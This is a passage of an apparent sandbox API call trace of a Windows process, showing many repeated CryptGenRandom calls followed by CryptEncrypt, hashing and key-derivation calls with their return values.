pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.051] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.052] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.053] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.054] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.055] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0144.055] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0144.057] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0144.057] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.057] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad2b8) returned 1 [0144.057] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0144.057] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0144.057] wcslen (_String="\\\\?\\") returned 0x4 